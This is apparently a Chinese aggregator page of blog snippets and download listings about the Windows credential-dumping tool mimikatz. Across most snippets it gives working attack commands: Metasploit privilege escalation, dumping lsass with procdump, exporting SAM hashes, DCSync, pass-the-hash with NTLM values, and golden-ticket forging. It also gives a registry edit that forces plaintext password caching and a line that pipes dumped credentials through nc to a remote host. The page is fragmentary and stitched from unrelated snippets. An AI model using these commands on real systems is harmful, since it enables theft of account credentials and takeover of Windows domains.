精华内容
下载资源
问答
  • mimikatz

    2019-09-10 16:14:00
    mimikatz已集成到metasploit中 需要SYSTEM权限 查看权限: getuid 若不是SYSTEM权限: getsystem 载入mimikatz load mimikatz 抓密码 mimikatz_command -f samdump::hashes MD5解密就行了 ...

    mimikatz已集成到metasploit中

    需要SYSTEM权限

    查看权限:

    getuid
    

    若不是SYSTEM权限:

    getsystem
    

    在这里插入图片描述

    载入mimikatz

    load mimikatz
    

    抓密码

    mimikatz_command -f samdump::hashes
    

    在这里插入图片描述
    MD5解密就行了

    展开全文
  • mimikatz 2.1

    2016-10-27 12:08:46
    mimikatz 2.1号版本。
  • mimikatz.rar

    2021-04-13 16:18:02
    mimikatz.rar
  • mimikatz.exe

    2021-01-15 13:22:27
    mimikatz.exe
  • mimikatz mimikatz is a tool I've made to learn C and make somes experiments with Windows security. It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory....
  • mimikatz最新版本

    2018-11-20 21:48:09
    mimikatz最新版本 嗅探hash
  • AppInitGlobalHooks-Mimikatz 从流程列表中隐藏Mimikatz 改编自此: : display=Print 更新到x64,并将Calc.exe更改为Mimikatz.exe
  • mimikatz.zip

    2021-06-23 01:33:34
    mimikatz(windows密码抓取神器) v2.2 可抓取win10哈希,配合彩虹表破解明文密码
  • mimikatz的使用

    千次阅读 多人点赞 2020-08-15 15:40:38
    mimikatz的下载地址 , 提取码是 kcuh mimikatz是个好东西,它的功能很多,最重要的是能获取windows的账号及明文密码 使用方法: 1:远程连接使用 控制远程的服务器后,‘帮助’对方下载mimikatz,然后以管理员身份...

    mimikatz是个好东西,它的功能很多,最重要的是能从 lsass.exe进程中获取windows的账号及明文密码——这是以前的事了,微软知道后已经准备了补丁,lsass进程不再保存明文口令。Mimikatz 现在只能读到加密后的密码。

    使用方法:

    1:远程连接使用

    控制远程的服务器后,‘帮助’对方下载mimikatz,然后以管理员身份运行

    privilege::debug   提取权限
    sekurlsa::logonpasswords   抓取密码
    

    在这里插入图片描述
    这里抓到了administrator的账号,密码是null,说明没设密码;当然,最大的可能是没抓到密码。解决方法可以看看注意的第四点

    在这里插入图片描述

    2:本地使用

    如果对方电脑开了防火墙,装了杀毒软件,如360,火绒,nod32之类的话。可能就不能在对方电脑上使用mimikatz
    在这里插入图片描述
    前面说过,mimikatz是从 lsass.exe进程中获取windows的账号及密码的,
    这时,我们可以帮对方安装一个procdump64.exe(这是微软自己的工具,可以放心使用)

    然后从 lsass.exe进程里导出一个 包含账号密码信息的lsass.dmp 文件,再把这个dmp文件传回来,最后在自己的环境下运行mimikatz,从 dmp文件里读取信息。

    1、安装procdump64.exe

    2、从procdump64.exe里导出lsass.dmp

    procdump64.exe -accepteula -ma lsass.exe lsass.dmp
    

    3、将lsass.dmp传回本地

    4、使用本地的mimikatz.exe读取lsass.dmp

    mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit"
    

    我没有搞成功,就不贴图了

    可以参考这几篇文章
    http://www.hackdig.com/07/hack-55560.htm
    https://www.cnblogs.com/kuaile1314/p/12288476.html

    注意:

    1、版本问题

    文件夹里有两个版本,一个是对应32位系统的,一个是64位系统的。搞混了是抓不到信息的

    在这里插入图片描述

    2、运行权限

    一定要用管理员身份运行

    在这里插入图片描述

    不然会提示权限不够

    在这里插入图片描述

    3、抓取范围

    因为它是从 lsass.exe进程中获取windows的账号密码,而每次关机重启后,lsass进程中的账号信息都会清空

    所以只能抓到上次关机后登录过的账号密码的信息

    4、抓不到密码的解决方法

    以下操作都在cmd里进行

    1. 开启Wdigest Auth服务
    reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
    
    1. 强制锁屏
    rundll32 user32.dll,LockWorkStation
    
    1. 等待目标系统管理员重新登录
    2. 截取明文密码
    3. 关闭Wdigest Auth服务
    reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
    

    但是我在写的时候出错了,说无效项名,也不知道啥原因
    百度半天也没解决这个问题,暂时先记下来,等找到解决方案了再写
    在这里插入图片描述

    mimikatz下载链接

    1、百度云盘,提取码是 kcuh
    2、csdn

    展开全文
  • mimikatz,ms14068

    2020-04-02 10:40:17
    mimikatz mimikatz is a tool I've made to learn C and make somes experiments with Windows security. It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from ...
  • mimikatz工具包

    2019-01-25 12:28:44
    轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码! Ping : 百寞' Blog » Blog Archive » 轻量级调试器神器 – mimikatz – 直接...
  • 猕猴桃mimikatz.zip

    2020-02-12 14:13:36
    mimikatz工具 下载地址:https://github.com/gentilkiwi/mimikatz/releases Mimikatz(usr/share/mimikatz)是在Kali上集成的Windows工具; Mimikatz2.工具是由法国人所写的,用法跟其他的工具不太一样;
  • Mimikatz使用

    2021-04-04 13:15:27
    Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制...

    简介

    Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统!

    使用:

    - 获取本地账号密码

    #提升权限
    privilege::debug
    
    #抓取密码
    sekurlsa::logonpasswords
    

    在这里插入图片描述
    当目标为win10或者2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。
    cmd修改注册表命令

    reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
    

    - SAM表获取hash

    #导出SAM数据
    reg save HKLM\SYSTEM SYSTEM
    reg save HKLM\SAM SAM
    
    #使用mimikatz提取hash
    lsadump::sam /sam:SAM /system:SYSTEM
    

    - Procdump+Mimikatz
    当mimikatz无法在主机上运行时,可以使用微软官方发布的工具Procdump导出lsass.exe:

    procdump64.exe -accepteula -ma lsass.exe lsass.dmp
    

    在这里插入图片描述

    将lsass.dmp下载到本地后,然后执行mimikatz:

    sekurlsa::minidump lsass.dmp
    sekurlsa::logonPasswords full
    

    为了方便复制与查看,可以输出到本地文件里面

    mimikatz.exe  sekurlsa::logonPasswords full > pssword.txt
    

    在这里插入图片描述
    在这里插入图片描述

    • 读取域控中域成员Hash
      域控以上域管理员身份执行mimikatz
    #提升权限
    privilege::debug
    抓取密码
    lsadump::lsa /patch
    

    方法二:通过 dcsync,利用目录复制服务(DRS)从NTDS.DIT文件中检索密码哈希值,可以在域管权限下执行获取:

    #获取所有域用户
    lsadump::dcsync /domain:test.com /all /csv
    
    #指定获取某个用户的hash
    lsadump::dcsync /domain:test.com /user:test
    
    • 导出域成员Hash
      域账户的用户名和hash密码以域数据库的形式存放在域控制器的%SystemRoot%\ntds\NTDS.DIT文件中。
      这里可以借助: ntdsutil.exe,域控制器自带的域数据库管理工具,我们可以通过域数据库,提取域种所有的域用户信息,在域控上执行如下命令,导入域数据库。
    #创建快照
    ntdsutil snapshot "activate instance ntds" create quit quit
    
    #加载快照
    ntdsutil snapshot "mount {72ba82f0-5805-4365-a73c-0ccd01f5ed0d}" quit quit
    
    #Copy文件副本
    copy C:\$SNAP_201911211122_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit
    
    • 哈希传递攻击
      当我们获得了一台主机得NTLM哈希值,我们可以使用mimikatz对其进行哈希传递攻击。执行完命令后,会弹出cmd窗口。
    #使用administrator用户的NTLM哈希值进行攻击
    sekurlsa::pth /user:administrator /domain:192.168.10.15 /ntlm:329153f560eb329c0e1deea55e88a1e9
    
    #使用xie用户的NTLM哈希值进行攻击
    sekurlsa::pth /user:xie /domain:192.168.10.15 /ntlm:329153f560eb329c0e1deea55e88a1e9
    

    - 域环境
    在域环境中,当我们获取得了域内用户得HTML哈希值,我们可以使用域内得一台主机用mimikatz对域控进行哈希传递攻击。执行完命令后,会弹出cmd窗口。前提是我们必须拥有域内任意一台主机得本地administrator权限和获得了域内用户得NTLM哈希值
    域:xie.com
    域控:WIN2008.xie.com

    #使用域管理员administrator的NTLM哈希值对域控进行哈希传递攻击
    sekurlsa::pth /user:administrator /domain:"xie.com" /ntlm:dbd621b8ed24eb627d32514476fac6c5 
    
    #使用域用户xie的NTLM哈希值对域控进行哈希传递攻击
    sekurlsa::pth /user:xie /domain:"xie.com" /ntlm:329153f560eb329c0e1deea55e88a1e9   
    

    票据传递攻击PPT

    - 黄金票据
    域内每个用户得ticket都是由krbtgt的密码hash来计算生成的,因此只要获取到了krbtgt用户的密码Hash,就可以随意伪造Ticket,进而使用Ticket登录域控制器,使用krbtgt用户hash生成的票据被称为Golden Ticket,此类攻击方法被称为票据传递攻击。
    首先获取krbtgt的用户hash:

    mimikatz "lsadump::dcsync /domain:xx.com /user:krbtgt"
    

    利用 mimikatz 生成域管权限的 Golden Ticket,填入对应的域管理员账号、域名称、sid值,如下:

    kerberos::golden /admin:administrator /domain:ABC.COM /sid:S-1-5-21-3912242732-2617380311-62526969 /krbtgt:c7af5cfc450e645ed4c46daa78fe18da /ticket:test.kiribi
    
    #导入刚才生成的票据
    kerberos::ptt test.kiribi
    
    #导入成功后可获取域管权限
    dir \\dc.abc.com\c$
    
    展开全文
  • Mimikatz 是由 Benjamin “gentilkiwi” Delpy 编写的。 特别是,该工具与结合使用时非常有用。 Netview 是一个网络扫描器,能够显示活动的 RDP 连接,帮助指出当前有多个网络用户登录的系统。这些是权限提升后 ...
  • Mimikatz - Windows 密码抓取神器 轻量级调试器神器 - mimikatz - 直接抓取 Windows 明文密码! 这个神器的功能肯定不仅仅如此 在我看来它更像一个轻量级调试器 可以提升进程权限 注入进程 读取
  • mimikatz源代码

    2015-04-11 21:34:54
    最新版的mimikatz的源代码
  • mimikatz记录

    2019-08-10 23:39:00
    mimikatz需要管理员权限运行 vps监听  nc -lvp 4444 服务器管理员权限执行  mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv 192.168.0.1 1234 服务器需要装nc ...

    mimikatz需要管理员权限运行

    vps监听

        nc -lvp 4444

    服务器管理员权限执行

        mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv 192.168.0.1 1234

    服务器需要装nc  

     

    转载于:https://www.cnblogs.com/xm17/p/11333531.html

    展开全文
  • mimikatz工具使用

    2020-07-10 16:53:51
    mimikatz使用命令:msf下的mimikatz mimikatz:后渗透工具,从window进程中获取内存,并获取明文密码和NTLM哈希值的工具。 kali路径:/usr/share/windows-resources/mimikatz 使用 将工具移植到靶机中: win32目录...
  • mimikatz_trunk2.1.1.zip

    2020-08-03 21:57:11
    mimikatz历史版本,有可能能在win10上运行成功,mimikatz_trunk2.1.1.zip
  • procdump+mimikatz.zip

    2019-11-14 19:18:23
    procdump+mimikatz
  • mimikatz使用

    千次阅读 2018-04-11 16:46:48
    mimikatz使用时需要高权限,至少是administrator权限 mimikatz抓取密码的命令需要system权限,可以先进行提权 privilege::debug //提升权限(从administrator提升到system) 抓取hash sekurlsa::...
  • MimkatzCollider Mimikatz HashClash
  • Mimikatz 命令

    2020-06-04 17:23:47
    最流行的 Mimikatz 命令 CRYPTO::Certificates – 列出/导出凭证 KERBEROS::Golden – 创建黄金票证/白银票证/信任票证 KERBEROS::List – 列出在用户的内存中所有用户的票证(TGT 和 TGS)。不需要特殊的权限,因为...
  • mimikatz直接抓密码.zip

    2020-03-23 16:51:39
    mimikatz直接抓密码.zip
  • ByPass_MIMIkatz-源码

    2021-05-26 04:50:07
    ByPass_MIMIkatz mimikatz 原版免杀,仅供安全研究 1、删除OR替换源码内相关特征;注释、无用空行等。 2、upx压缩,删除PE里面带upx相关字段。 3、伪造签名。 主要是思路,杀了重新做一份即可免杀 example windows....
  • mimikatz VC源码

    2013-09-23 10:34:49
    mimikatz 源代码 vs2012格式 使用windows xp - 8.1

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 2,916
精华内容 1,166
关键字:

mimikatz